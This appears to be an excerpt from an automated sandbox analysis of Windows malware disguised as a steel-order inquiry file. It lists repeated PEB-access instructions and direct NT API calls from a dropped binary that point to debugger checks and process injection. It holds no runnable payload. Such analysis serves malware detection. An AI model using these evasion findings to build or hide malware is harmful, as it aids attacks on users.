Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE096E mov eax, dword ptr fs:[00000030h]		0_2_00EE096E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE096E mov edx, dword ptr fs:[00000030h]		0_2_00EE096E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE096E mov eax, dword ptr fs:[00000030h]		0_2_00EE096E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F44978 mov eax, dword ptr fs:[00000030h]		0_2_00F44978
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F44978 mov eax, dword ptr fs:[00000030h]		0_2_00F44978
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC6962 mov eax, dword ptr fs:[00000030h]		0_2_00EC6962
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC6962 mov eax, dword ptr fs:[00000030h]		0_2_00EC6962
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC6962 mov eax, dword ptr fs:[00000030h]		0_2_00EC6962
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2C97C mov eax, dword ptr fs:[00000030h]		0_2_00F2C97C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F20946 mov eax, dword ptr fs:[00000030h]		0_2_00F20946
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74940 mov eax, dword ptr fs:[00000030h]		0_2_00F74940
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2892A mov eax, dword ptr fs:[00000030h]		0_2_00F2892A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F3892B mov eax, dword ptr fs:[00000030h]		0_2_00F3892B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2C912 mov eax, dword ptr fs:[00000030h]		0_2_00F2C912
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E98918 mov eax, dword ptr fs:[00000030h]		0_2_00E98918
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E98918 mov eax, dword ptr fs:[00000030h]		0_2_00E98918
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E908 mov eax, dword ptr fs:[00000030h]		0_2_00F1E908
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E908 mov eax, dword ptr fs:[00000030h]		0_2_00F1E908
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDAAEE mov eax, dword ptr fs:[00000030h]		0_2_00EDAAEE
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDAAEE mov eax, dword ptr fs:[00000030h]		0_2_00EDAAEE
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EF6ACC mov eax, dword ptr fs:[00000030h]		0_2_00EF6ACC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EF6ACC mov eax, dword ptr fs:[00000030h]		0_2_00EF6ACC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EF6ACC mov eax, dword ptr fs:[00000030h]		0_2_00EF6ACC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0AD0 mov eax, dword ptr fs:[00000030h]		0_2_00EA0AD0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED4AD0 mov eax, dword ptr fs:[00000030h]		0_2_00ED4AD0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED4AD0 mov eax, dword ptr fs:[00000030h]		0_2_00ED4AD0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA8AA0 mov eax, dword ptr fs:[00000030h]		0_2_00EA8AA0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA8AA0 mov eax, dword ptr fs:[00000030h]		0_2_00EA8AA0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EF6AA4 mov eax, dword ptr fs:[00000030h]		0_2_00EF6AA4
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAEA80 mov eax, dword ptr fs:[00000030h]		0_2_00EAEA80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74A80 mov eax, dword ptr fs:[00000030h]		0_2_00F74A80
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED8A90 mov edx, dword ptr fs:[00000030h]		0_2_00ED8A90
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDCA6F mov eax, dword ptr fs:[00000030h]		0_2_00EDCA6F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDCA6F mov eax, dword ptr fs:[00000030h]		0_2_00EDCA6F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDCA6F mov eax, dword ptr fs:[00000030h]		0_2_00EDCA6F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1CA72 mov eax, dword ptr fs:[00000030h]		0_2_00F1CA72
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1CA72 mov eax, dword ptr fs:[00000030h]		0_2_00F1CA72
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4EA60 mov eax, dword ptr fs:[00000030h]		0_2_00F4EA60
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0A5B mov eax, dword ptr fs:[00000030h]		0_2_00EB0A5B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0A5B mov eax, dword ptr fs:[00000030h]		0_2_00EB0A5B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]		0_2_00EA6A50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]		0_2_00EA6A50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]		0_2_00EA6A50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]		0_2_00EA6A50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]		0_2_00EA6A50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]		0_2_00EA6A50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6A50 mov eax, dword ptr fs:[00000030h]		0_2_00EA6A50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECEA2E mov eax, dword ptr fs:[00000030h]		0_2_00ECEA2E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDCA24 mov eax, dword ptr fs:[00000030h]		0_2_00EDCA24
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDCA38 mov eax, dword ptr fs:[00000030h]		0_2_00EDCA38
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC4A35 mov eax, dword ptr fs:[00000030h]		0_2_00EC4A35
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC4A35 mov eax, dword ptr fs:[00000030h]		0_2_00EC4A35
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2CA11 mov eax, dword ptr fs:[00000030h]		0_2_00F2CA11
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2CBF0 mov eax, dword ptr fs:[00000030h]		0_2_00F2CBF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECEBFC mov eax, dword ptr fs:[00000030h]		0_2_00ECEBFC
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA8BF0 mov eax, dword ptr fs:[00000030h]		0_2_00EA8BF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA8BF0 mov eax, dword ptr fs:[00000030h]		0_2_00EA8BF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA8BF0 mov eax, dword ptr fs:[00000030h]		0_2_00EA8BF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4EBD0 mov eax, dword ptr fs:[00000030h]		0_2_00F4EBD0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC0BCB mov eax, dword ptr fs:[00000030h]		0_2_00EC0BCB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC0BCB mov eax, dword ptr fs:[00000030h]		0_2_00EC0BCB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC0BCB mov eax, dword ptr fs:[00000030h]		0_2_00EC0BCB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0BCD mov eax, dword ptr fs:[00000030h]		0_2_00EA0BCD
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0BCD mov eax, dword ptr fs:[00000030h]		0_2_00EA0BCD
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0BCD mov eax, dword ptr fs:[00000030h]		0_2_00EA0BCD
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F54BB0 mov eax, dword ptr fs:[00000030h]		0_2_00F54BB0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F54BB0 mov eax, dword ptr fs:[00000030h]		0_2_00F54BB0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0BBE mov eax, dword ptr fs:[00000030h]		0_2_00EB0BBE
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0BBE mov eax, dword ptr fs:[00000030h]		0_2_00EB0BBE
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9CB7E mov eax, dword ptr fs:[00000030h]		0_2_00E9CB7E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F72B57 mov eax, dword ptr fs:[00000030h]		0_2_00F72B57
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F72B57 mov eax, dword ptr fs:[00000030h]		0_2_00F72B57
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F72B57 mov eax, dword ptr fs:[00000030h]		0_2_00F72B57
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F72B57 mov eax, dword ptr fs:[00000030h]		0_2_00F72B57
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4EB50 mov eax, dword ptr fs:[00000030h]		0_2_00F4EB50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F36B40 mov eax, dword ptr fs:[00000030h]		0_2_00F36B40
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F36B40 mov eax, dword ptr fs:[00000030h]		0_2_00F36B40
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6AB40 mov eax, dword ptr fs:[00000030h]		0_2_00F6AB40
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F48B42 mov eax, dword ptr fs:[00000030h]		0_2_00F48B42
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E98B50 mov eax, dword ptr fs:[00000030h]		0_2_00E98B50
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F54B4B mov eax, dword ptr fs:[00000030h]		0_2_00F54B4B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F54B4B mov eax, dword ptr fs:[00000030h]		0_2_00F54B4B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECEB20 mov eax, dword ptr fs:[00000030h]		0_2_00ECEB20
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECEB20 mov eax, dword ptr fs:[00000030h]		0_2_00ECEB20
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F68B28 mov eax, dword ptr fs:[00000030h]		0_2_00F68B28
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F68B28 mov eax, dword ptr fs:[00000030h]		0_2_00F68B28
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]		0_2_00F1EB1D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]		0_2_00F1EB1D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]		0_2_00F1EB1D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1EB1D mov eax, dword ptr fs:[00000030h]		0_2_00F1EB1D

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtQueryVolumeInformationFile: Direct from: 0x776D2F2C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtQuerySystemInformation: Direct from: 0x776D48CC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtAllocateVirtualMemory: Direct from: 0x776D48EC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtOpenSection: Direct from: 0x776D2E0C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtDeviceIoControlFile: Direct from: 0x776D2AEC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtAllocateVirtualMemory: Direct from: 0x776D2BEC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtQueryInformationProcess: Direct from: 0x776D2C26			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtResumeThread: Direct from: 0x776D2FBC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtWriteVirtualMemory: Direct from: 0x776D490C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtCreateUserProcess: Direct from: 0x776D371C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtClose: Direct from: 0x776D2B6C
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtAllocateVirtualMemory: Direct from: 0x776D3C9C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtSetInformationThread: Direct from: 0x776C63F9			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtQueryAttributesFile: Direct from: 0x776D2E6C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtSetInformationThread: Direct from: 0x776D2B4C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtReadVirtualMemory: Direct from: 0x776D2E8C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtCreateKey: Direct from: 0x776D2C6C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtResumeThread: Direct from: 0x776D36AC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtMapViewOfSection: Direct from: 0x776D2D1C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtWriteVirtualMemory: Direct from: 0x776D2E3C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtUnmapViewOfSection: Direct from: 0x776D2D3C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtCreateMutant: Direct from: 0x776D35CC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtAllocateVirtualMemory: Direct from: 0x776D2BFC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtDelayExecution: Direct from: 0x776D2DDC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtProtectVirtualMemory: Direct from: 0x776C7B2E			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtQuerySystemInformation: Direct from: 0x776D2DFC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtReadFile: Direct from: 0x776D2ADC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtTerminateThread: Direct from: 0x776D2FCC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtQueryInformationToken: Direct from: 0x776D2CAC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtCreateFile: Direct from: 0x776D2FEC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtOpenFile: Direct from: 0x776D2DCC			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtOpenKeyEx: Direct from: 0x776D2B9C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtNotifyChangeKey: Direct from: 0x776D3C2C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtSetInformationProcess: Direct from: 0x776D2C5C			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	NtProtectVirtualMemory: Direct from: 0x776D2F9C			Jump to behavior

